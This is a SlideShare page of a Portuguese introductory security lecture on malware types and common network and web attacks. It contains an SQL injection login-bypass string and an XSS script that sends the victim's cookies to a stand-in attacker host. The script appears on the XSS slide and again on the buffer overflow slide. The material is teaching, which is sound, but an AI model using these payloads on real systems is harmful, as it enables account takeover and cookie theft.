SlideShare uma empresa Scribd logo
1 de 24
Baixar para ler offline
Técnico de Manutenção e Suporte em Informática
Disciplina - Segurança da Informação
Unidade 2 – Malwares e Ataques mais comuns

          Prof. Leandro Cavalcanti de Almeida
            lcavalcanti.almeida@gmail.com
                   @leandrocalmeida
Malwares
Malwares = Software Maliciosos


                                    Cavalo
   Vírus     Bot      Backdoors       de
                                     Tróia



  Worms    Rootkits   Spywares    Keylogger
Vírus
Trecho de código, geralmente em assembler, que
é injetado dentro de outro aplicativo

Modo de Operação: necessidade de um código
hospedeiro para sobreviver e replicar. Necessita
da ação do usuário


                                            Vírus
Keylogger
Aplicativo voltado para capturar tudo o que se é
digitado no teclado

Modo de Operação: aplicativo captura tudo que é
digitado e envia de tempos em tempos para o
atacante


                                          Keylogger
Worm
Aplicativo que realiza escaneamentos na rede em
busca de hosts vulneráveis. Não necessita da ação
do usuário

Modo de Operação: Se instala e replica entre
hosts na rede de forma cíclica


                                          Worms
Bot
Robô, que possui funcionalidades de worms, e fica
aguardando a ordem do seu mestre para realizar
ataques a outros computadores

Modo de Operação: Após o comando do mestre
realiza um DoS em algum outro host na rede


                                            Bot
RootKit
Aplicativo que têm como finalidade permitir
acesso privilegiado a um invasor, escondendo
seus rastros

Modo de Operação: Geralmente se camufla em
outros processos do sistema e abre uma
backdoor para acessos remotos não
autorizados
                                         Rootkits
Backdoor
Aplicativo que têm como finalidade permitir
acesso remoto através da abertura não autorizada
de uma porta

Modo de Operação: Geralmente habilitam uma
porta alta para acessos não autorizados


                                        Backdoors
Spywares
Aplicativo que têm como finalidade coletar
informações estatísticas dos hosts e enviá-las ao
atacante

Modo de Operação: Monitoram processos e
conexões de rede e enviam essas
informações so atacante

                                          Spywares
Cavalo de Tróia
Presente de grego camuflado em arquivos como
fotos, cartões virtuas, jogos,... que tem funções
destrutivas

Modo de Operação: após a vítima baixar o
“presente” o trojan instala outro Malware

                                             Cavalo
                                               de
                                              Tróia
Ataques
Aplicação        Sql Injection     XSS
                   Buffer Overflow
Transporte    TCP SYN FLOOD UDP FLOOD
                    Main in the Middle

  Rede         IP Spoofing ICMP Flooding
                        STP Attack
 Enlace        ARP Spoofing
                           ARP Poisoning
  Físico                MAC Spoofing
SQL Injection
        Ex : Sistema de autenticação em PHP




Imagine se o usuário inserir os dados abaixo...
Login: qualquer coisa
Senha: ' OR '1'='1

SELECT * FROM usuarios WHERE login='qualquer coisa' AND senha = '' OR '1'='1'

  Essa query SQL retornará todos os registros da tabela usuários!
XSS
Suposição:Facebook vulnerável a Cross-Site Scripting

                                                                      Usuário ingênuo clica no link...




                          <script>
                                Document.location =
                                'http://sitedocracker.com/roubarcokkies.php=' + document.cookie
                          </script>




Insere um código(html, Javascript,...) malicioso no lugar de um post na
base de dados do facebook
Buffer Overflow
char nome[4];                                           int idade;


  L      E             O 0                                  2 0
Entrada: LEO idade: 20
char nome[4];                                           int idade;

  L      E             O O                                   A 0
             <script>
                   Document.location =
                   'http://sitedocracker.com/roubarcokkies.php=' + document.cookie
             </script>



Entrada: LEOOA idade: 65
TCP SYN FLOOD


       SYN

    SYN-ACK

       ACK

       SYN
       SYN
       SYN
       SYN
       SYN
       SYN
UDP FLOOD

 UDP – porta qualquer

 UDP – porta qualquer

 UDP – porta qualquer

 UDP – porta qualquer

 UDP – porta qualquer

 UDP – porta qualquer
Main in the Middle
    Packet




                      Packet




                               Packet


             Packet
IP Spoofing
           Packet


                                        Packet

10.0.0.1


                                                Packet
                                       Packet              10.0.0.254


           Packet




            Packet
                     Atacante envia pacotes IP falsificados para
                     a vítima, se passando por outro host na
10.0.0.1             rede!
ICMP Flooding

   ICMP – echo request

   ICMP – echo request

   ICMP – echo request

   ICMP – echo request

   ICMP – echo request

   ICMP – echo request
Spanning Tree Attack
                                                     Packet
           Packet
                                                                  VLAN 2
VLAN 1



                                                PacketPacket
                                                  Packet Packet
                                                    Packet           Packet


           Packet
                                                          Atacante se torna Root bridge

                          Packet
                                                Packet
 VLAN 1        Packet              Packet



  VLAN 1


                                                                           VLAN 3
 VLAN 1                 VLAN 2              VLAN 2
ARP Spoofing
                        Packet


                                                    Packet

IP: 10.0.0.1
MAC:
                      Packet
68:A3:C4:9B:73:54

                                                                      IP: 10.0.0.254
                                                             Packet
                                                                      MAC: 52:54:00:69:42:4A
                      arpspoof
                       Packet


                    Packet
                                 Atacante envia pacotes ARP falsificados
IP: 10.0.0.2                     para a vítima, se passando por outro host
MAC:
                                 na rede!
68:A3:C4:9B:73:54
ARP Poisoning

IP: 10.0.0.1
MAC:68:A3:C4:9B:73:54


                               1   MAC                    IP: 10.0.0.254
                               2   MAC                    MAC: 52:54:00:69:42:4A
                  Packet
                               3   MAC
                               4   MAC
                               5   MAC
                               6   MAC

                           Atacante envenena a tabela ARP do Switch
IP: 10.0.0.2
MAC: 68:A3:C4:9B:73:54
MAC Spoofing
                     Packet


                                                Packet

68:A3:C4:9B:73:54
                    Packet



                                                                  52:54:00:69:42:4A
                                                         Packet



                    Packet




                              Atacante envia pacotes com endereço MAC
                              falsificado para a vítima, se passando por
68:A3:C4:9B:73:54             outro host na rede!

Mais conteúdo relacionado

Destaque

Aula 1 rede com packet tracer
Aula 1 rede com packet tracerAula 1 rede com packet tracer
Aula 1 rede com packet tracerArlimar Jacinto
 
Packet Tracer
Packet TracerPacket Tracer
Packet Tracerdanists
 
Diario de um sobrevivente livre - Abdala Cerqueira
Diario de um sobrevivente livre - Abdala CerqueiraDiario de um sobrevivente livre - Abdala Cerqueira
Diario de um sobrevivente livre - Abdala CerqueiraPotiLivre Sobrenome
 
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaSegurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaTchelinux
 
Introdução ao mongodb - José Inoue - TchêLinux Uruguaiana
Introdução ao mongodb - José Inoue - TchêLinux UruguaianaIntrodução ao mongodb - José Inoue - TchêLinux Uruguaiana
Introdução ao mongodb - José Inoue - TchêLinux UruguaianaTchelinux
 
Apresentacao institucional 4Linux
Apresentacao institucional 4LinuxApresentacao institucional 4Linux
Apresentacao institucional 4Linux4LinuxCursos
 
TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...
TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...
TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...Tchelinux
 
Zabbix + GLPI: Como estas duas ferramentas podem otimizar seus recursos
Zabbix + GLPI: Como estas duas ferramentas  podem otimizar seus recursosZabbix + GLPI: Como estas duas ferramentas  podem otimizar seus recursos
Zabbix + GLPI: Como estas duas ferramentas podem otimizar seus recursosJose Ferronato
 
Clonezilla seu amigo vai salvar seus dados do perigo
Clonezilla seu amigo vai salvar seus dados do perigoClonezilla seu amigo vai salvar seus dados do perigo
Clonezilla seu amigo vai salvar seus dados do perigoTchelinux
 
Monitoração de Infraestrutura e Serviços - Sensu
Monitoração de Infraestrutura e Serviços - SensuMonitoração de Infraestrutura e Serviços - Sensu
Monitoração de Infraestrutura e Serviços - SensuRoberto Scudeller
 
Inteligência Operacional utilizando a solução Elastic.
Inteligência Operacional utilizando a solução Elastic.Inteligência Operacional utilizando a solução Elastic.
Inteligência Operacional utilizando a solução Elastic.4LinuxCursos
 
Espelhamento de discos RAID1 - Thiago Finardi - TchêLinux Uruguaiana
Espelhamento de discos RAID1 - Thiago Finardi - TchêLinux UruguaianaEspelhamento de discos RAID1 - Thiago Finardi - TchêLinux Uruguaiana
Espelhamento de discos RAID1 - Thiago Finardi - TchêLinux UruguaianaTchelinux
 
Apresentacao institucional 4Linux
Apresentacao institucional 4LinuxApresentacao institucional 4Linux
Apresentacao institucional 4Linux4LinuxCursos
 
Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...
Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...
Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...Tchelinux
 
Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman - ...
Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman  - ...Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman  - ...
Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman - ...Tchelinux
 
Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...
Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...
Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...Bruno Vasconcellos
 
Afinal de contas, o que é o Debian?
Afinal de contas, o que é o Debian?Afinal de contas, o que é o Debian?
Afinal de contas, o que é o Debian?PotiLivre Sobrenome
 

Destaque (20)

Aula 1 rede com packet tracer
Aula 1 rede com packet tracerAula 1 rede com packet tracer
Aula 1 rede com packet tracer
 
Aula 2 de software de aplicação
Aula 2 de software de aplicaçãoAula 2 de software de aplicação
Aula 2 de software de aplicação
 
Packet Tracer
Packet TracerPacket Tracer
Packet Tracer
 
Diario de um sobrevivente livre - Abdala Cerqueira
Diario de um sobrevivente livre - Abdala CerqueiraDiario de um sobrevivente livre - Abdala Cerqueira
Diario de um sobrevivente livre - Abdala Cerqueira
 
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaSegurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
 
Introdução ao mongodb - José Inoue - TchêLinux Uruguaiana
Introdução ao mongodb - José Inoue - TchêLinux UruguaianaIntrodução ao mongodb - José Inoue - TchêLinux Uruguaiana
Introdução ao mongodb - José Inoue - TchêLinux Uruguaiana
 
Apresentacao institucional 4Linux
Apresentacao institucional 4LinuxApresentacao institucional 4Linux
Apresentacao institucional 4Linux
 
TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...
TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...
TI Verde, mais que teoria... Uma prática! - Jonas Casarin (FURG) / Julio Cesa...
 
Zabbix + GLPI: Como estas duas ferramentas podem otimizar seus recursos
Zabbix + GLPI: Como estas duas ferramentas  podem otimizar seus recursosZabbix + GLPI: Como estas duas ferramentas  podem otimizar seus recursos
Zabbix + GLPI: Como estas duas ferramentas podem otimizar seus recursos
 
Clonezilla seu amigo vai salvar seus dados do perigo
Clonezilla seu amigo vai salvar seus dados do perigoClonezilla seu amigo vai salvar seus dados do perigo
Clonezilla seu amigo vai salvar seus dados do perigo
 
Monitoração de Infraestrutura e Serviços - Sensu
Monitoração de Infraestrutura e Serviços - SensuMonitoração de Infraestrutura e Serviços - Sensu
Monitoração de Infraestrutura e Serviços - Sensu
 
Inteligência Operacional utilizando a solução Elastic.
Inteligência Operacional utilizando a solução Elastic.Inteligência Operacional utilizando a solução Elastic.
Inteligência Operacional utilizando a solução Elastic.
 
Roteiro samba
Roteiro sambaRoteiro samba
Roteiro samba
 
Espelhamento de discos RAID1 - Thiago Finardi - TchêLinux Uruguaiana
Espelhamento de discos RAID1 - Thiago Finardi - TchêLinux UruguaianaEspelhamento de discos RAID1 - Thiago Finardi - TchêLinux Uruguaiana
Espelhamento de discos RAID1 - Thiago Finardi - TchêLinux Uruguaiana
 
Apresentacao institucional 4Linux
Apresentacao institucional 4LinuxApresentacao institucional 4Linux
Apresentacao institucional 4Linux
 
Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...
Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...
Desenvolvimento de um Sistema de Gestão Acadêmica com Software Livre - Rodrig...
 
Aula 1 - Sistema de Informação
Aula 1 - Sistema de InformaçãoAula 1 - Sistema de Informação
Aula 1 - Sistema de Informação
 
Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman - ...
Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman  - ...Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman  - ...
Rodando e instalandosistemas operacionaispela rede - Nasser Othman Rahman - ...
 
Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...
Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...
Criando um Aplicativo Android para Consumir uma API RESTFul Desenvolvida em A...
 
Afinal de contas, o que é o Debian?
Afinal de contas, o que é o Debian?Afinal de contas, o que é o Debian?
Afinal de contas, o que é o Debian?
 

Semelhante a Unidade 2 malwares e ataques

Firewall em Linux
Firewall em LinuxFirewall em Linux
Firewall em Linuxguest4e5ab
 
Interceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fiosInterceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fiosDerek Budde
 
Webinar # 17 – Análise de Malware em Forense Computacional
Webinar # 17 – Análise de Malware em Forense ComputacionalWebinar # 17 – Análise de Malware em Forense Computacional
Webinar # 17 – Análise de Malware em Forense ComputacionalClavis Segurança da Informação
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univemevandrovv
 
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Luiz Arthur
 
Seguranca em IPv6 com Mikrotik RouterOS
Seguranca em IPv6 com Mikrotik RouterOSSeguranca em IPv6 com Mikrotik RouterOS
Seguranca em IPv6 com Mikrotik RouterOSWardner Maia
 
Arp e DNS Spoof - Prática de Ataques
Arp e DNS Spoof - Prática de AtaquesArp e DNS Spoof - Prática de Ataques
Arp e DNS Spoof - Prática de AtaquesAndre Peres
 
Man in the Middle - Prática de Ataques
Man in the Middle - Prática de AtaquesMan in the Middle - Prática de Ataques
Man in the Middle - Prática de AtaquesAndre Peres
 
Linux network administration | Curso de Redes | 3Way Networks
Linux network administration | Curso de Redes | 3Way NetworksLinux network administration | Curso de Redes | 3Way Networks
Linux network administration | Curso de Redes | 3Way Networks3Way Networks
 
Ccna1 10 - fundamentos de routing e de sub-redes
Ccna1 10 - fundamentos de routing e de sub-redesCcna1 10 - fundamentos de routing e de sub-redes
Ccna1 10 - fundamentos de routing e de sub-redesTaurux Vaz
 

Semelhante a Unidade 2 malwares e ataques (20)

Botnets
BotnetsBotnets
Botnets
 
Netfilter + Iptables
Netfilter + IptablesNetfilter + Iptables
Netfilter + Iptables
 
Firewall em Linux
Firewall em LinuxFirewall em Linux
Firewall em Linux
 
Interceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fiosInterceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fios
 
TCP/IP Layers
TCP/IP LayersTCP/IP Layers
TCP/IP Layers
 
Webinar # 17 – Análise de Malware em Forense Computacional
Webinar # 17 – Análise de Malware em Forense ComputacionalWebinar # 17 – Análise de Malware em Forense Computacional
Webinar # 17 – Análise de Malware em Forense Computacional
 
03 seguranca redesi-pv6
03 seguranca redesi-pv603 seguranca redesi-pv6
03 seguranca redesi-pv6
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univem
 
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
 
Seguranca em IPv6 com Mikrotik RouterOS
Seguranca em IPv6 com Mikrotik RouterOSSeguranca em IPv6 com Mikrotik RouterOS
Seguranca em IPv6 com Mikrotik RouterOS
 
Redes de computador
Redes de computadorRedes de computador
Redes de computador
 
Arp e DNS Spoof - Prática de Ataques
Arp e DNS Spoof - Prática de AtaquesArp e DNS Spoof - Prática de Ataques
Arp e DNS Spoof - Prática de Ataques
 
Ipv6
Ipv6Ipv6
Ipv6
 
Man in the Middle - Prática de Ataques
Man in the Middle - Prática de AtaquesMan in the Middle - Prática de Ataques
Man in the Middle - Prática de Ataques
 
Aula introdutoria parte 2
Aula introdutoria   parte 2Aula introdutoria   parte 2
Aula introdutoria parte 2
 
Analise de Logs
Analise de LogsAnalise de Logs
Analise de Logs
 
Sniffers
SniffersSniffers
Sniffers
 
Aula 8.0 - Segurança
Aula 8.0 - SegurançaAula 8.0 - Segurança
Aula 8.0 - Segurança
 
Linux network administration | Curso de Redes | 3Way Networks
Linux network administration | Curso de Redes | 3Way NetworksLinux network administration | Curso de Redes | 3Way Networks
Linux network administration | Curso de Redes | 3Way Networks
 
Ccna1 10 - fundamentos de routing e de sub-redes
Ccna1 10 - fundamentos de routing e de sub-redesCcna1 10 - fundamentos de routing e de sub-redes
Ccna1 10 - fundamentos de routing e de sub-redes
 

Mais de Leandro Almeida (20)

D do s
D do sD do s
D do s
 
Unidade2 projeto lógico da rede
Unidade2   projeto lógico da redeUnidade2   projeto lógico da rede
Unidade2 projeto lógico da rede
 
Roteiro cups
Roteiro cupsRoteiro cups
Roteiro cups
 
Roteiro sambaswat
Roteiro sambaswatRoteiro sambaswat
Roteiro sambaswat
 
Unidade6 roteiro pentest
Unidade6 roteiro pentestUnidade6 roteiro pentest
Unidade6 roteiro pentest
 
Roteiro vsftpd
Roteiro vsftpdRoteiro vsftpd
Roteiro vsftpd
 
Roteiro sshd
Roteiro sshdRoteiro sshd
Roteiro sshd
 
Roteiro nfs
Roteiro nfsRoteiro nfs
Roteiro nfs
 
Unidade5 roteiro footprint
Unidade5 roteiro footprintUnidade5 roteiro footprint
Unidade5 roteiro footprint
 
Unidade5 footprint
Unidade5 footprintUnidade5 footprint
Unidade5 footprint
 
Unidade8 roteiro
Unidade8 roteiroUnidade8 roteiro
Unidade8 roteiro
 
Unidade 8 ieee802-11i
Unidade 8   ieee802-11iUnidade 8   ieee802-11i
Unidade 8 ieee802-11i
 
Unidade4 cripto
Unidade4 criptoUnidade4 cripto
Unidade4 cripto
 
Roteiro dns
Roteiro dnsRoteiro dns
Roteiro dns
 
Unidade 6 servico dns
Unidade 6   servico dnsUnidade 6   servico dns
Unidade 6 servico dns
 
Roteiro web
Roteiro webRoteiro web
Roteiro web
 
Unidade7 roteiro
Unidade7 roteiroUnidade7 roteiro
Unidade7 roteiro
 
Unidade 7 cripto
Unidade 7  criptoUnidade 7  cripto
Unidade 7 cripto
 
Unidade 5 servico web
Unidade 5   servico webUnidade 5   servico web
Unidade 5 servico web
 
Unidade3 seg perimetral-vpn
Unidade3 seg perimetral-vpnUnidade3 seg perimetral-vpn
Unidade3 seg perimetral-vpn
 

Unidade 2 malwares e ataques

  • 1. Técnico de Manutenção e Suporte em Informática Disciplina - Segurança da Informação Unidade 2 – Malwares e Ataques mais comuns Prof. Leandro Cavalcanti de Almeida lcavalcanti.almeida@gmail.com @leandrocalmeida
  • 3. Malwares = Software Maliciosos Cavalo Vírus Bot Backdoors de Tróia Worms Rootkits Spywares Keylogger
  • 4. Vírus Trecho de código, geralmente em assembler, que é injetado dentro de outro aplicativo Modo de Operação: necessidade de um código hospedeiro para sobreviver e replicar. Necessita da ação do usuário Vírus
  • 5. Keylogger Aplicativo voltado para capturar tudo o que se é digitado no teclado Modo de Operação: aplicativo captura tudo que é digitado e envia de tempos em tempos para o atacante Keylogger
  • 6. Worm Aplicativo que realiza escaneamentos na rede em busca de hosts vulneráveis. Não necessita da ação do usuário Modo de Operação: Se instala e replica entre hosts na rede de forma cíclica Worms
  • 7. Bot Robô, que possui funcionalidades de worms, e fica aguardando a ordem do seu mestre para realizar ataques a outros computadores Modo de Operação: Após o comando do mestre realiza um DoS em algum outro host na rede Bot
  • 8. RootKit Aplicativo que têm como finalidade permitir acesso privilegiado a um invasor, escondendo seus rastros Modo de Operação: Geralmente se camufla em outros processos do sistema e abre uma backdoor para acessos remotos não autorizados Rootkits
  • 9. Backdoor Aplicativo que têm como finalidade permitir acesso remoto através da abertura não autorizada de uma porta Modo de Operação: Geralmente habilitam uma porta alta para acessos não autorizados Backdoors
  • 10. Spywares Aplicativo que têm como finalidade coletar informações estatísticas dos hosts e enviá-las ao atacante Modo de Operação: Monitoram processos e conexões de rede e enviam essas informações so atacante Spywares
  • 11. Cavalo de Tróia Presente de grego camuflado em arquivos como fotos, cartões virtuas, jogos,... que tem funções destrutivas Modo de Operação: após a vítima baixar o “presente” o trojan instala outro Malware Cavalo de Tróia
  • 12. Ataques Aplicação Sql Injection XSS Buffer Overflow Transporte TCP SYN FLOOD UDP FLOOD Main in the Middle Rede IP Spoofing ICMP Flooding STP Attack Enlace ARP Spoofing ARP Poisoning Físico MAC Spoofing
  • 13. SQL Injection Ex : Sistema de autenticação em PHP Imagine se o usuário inserir os dados abaixo... Login: qualquer coisa Senha: ' OR '1'='1 SELECT * FROM usuarios WHERE login='qualquer coisa' AND senha = '' OR '1'='1' Essa query SQL retornará todos os registros da tabela usuários!
  • 14. XSS Suposição:Facebook vulnerável a Cross-Site Scripting Usuário ingênuo clica no link... <script> Document.location = 'http://sitedocracker.com/roubarcokkies.php=' + document.cookie </script> Insere um código(html, Javascript,...) malicioso no lugar de um post na base de dados do facebook
  • 15. Buffer Overflow char nome[4]; int idade; L E O 0 2 0 Entrada: LEO idade: 20 char nome[4]; int idade; L E O O A 0 <script> Document.location = 'http://sitedocracker.com/roubarcokkies.php=' + document.cookie </script> Entrada: LEOOA idade: 65
  • 16. TCP SYN FLOOD SYN SYN-ACK ACK SYN SYN SYN SYN SYN SYN
  • 17. UDP FLOOD UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer
  • 18. Main in the Middle Packet Packet Packet Packet
  • 19. IP Spoofing Packet Packet 10.0.0.1 Packet Packet 10.0.0.254 Packet Packet Atacante envia pacotes IP falsificados para a vítima, se passando por outro host na 10.0.0.1 rede!
  • 20. ICMP Flooding ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request
  • 21. Spanning Tree Attack Packet Packet VLAN 2 VLAN 1 PacketPacket Packet Packet Packet Packet Packet Atacante se torna Root bridge Packet Packet VLAN 1 Packet Packet VLAN 1 VLAN 3 VLAN 1 VLAN 2 VLAN 2
  • 22. ARP Spoofing Packet Packet IP: 10.0.0.1 MAC: Packet 68:A3:C4:9B:73:54 IP: 10.0.0.254 Packet MAC: 52:54:00:69:42:4A arpspoof Packet Packet Atacante envia pacotes ARP falsificados IP: 10.0.0.2 para a vítima, se passando por outro host MAC: na rede! 68:A3:C4:9B:73:54
  • 23. ARP Poisoning IP: 10.0.0.1 MAC:68:A3:C4:9B:73:54 1 MAC IP: 10.0.0.254 2 MAC MAC: 52:54:00:69:42:4A Packet 3 MAC 4 MAC 5 MAC 6 MAC Atacante envenena a tabela ARP do Switch IP: 10.0.0.2 MAC: 68:A3:C4:9B:73:54
  • 24. MAC Spoofing Packet Packet 68:A3:C4:9B:73:54 Packet 52:54:00:69:42:4A Packet Packet Atacante envia pacotes com endereço MAC falsificado para a vítima, se passando por 68:A3:C4:9B:73:54 outro host na rede!